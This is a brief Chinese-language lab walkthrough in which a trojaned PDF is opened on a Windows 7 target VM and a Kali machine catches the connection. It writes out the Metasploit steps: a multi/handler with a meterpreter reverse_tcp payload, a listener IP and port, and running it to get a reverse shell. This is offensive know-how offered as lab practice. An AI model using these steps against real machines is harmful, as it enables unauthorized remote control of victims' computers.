实验环境:kali-linux虚拟机(攻击机)、win7虚拟机(靶机) 实验工具:Vmware、kali-linux的iso
1.将带有木马的PDF文件复制到靶机中
2.查看本机ip地址 3.点击打开PD文件
1.在攻击机中打开监听模块:
#> use multi/handler2.查看需要设置的参数:
#> show options 在攻击机中加载连接负荷 #> set payload windows/meterpreter/reverse_tcp4.设置攻击机IP地址、端口号
#> set lhost 10.10.4.234 #> set lport 44445.运行监听模块
#> exploit6.反弹会话,拿到shell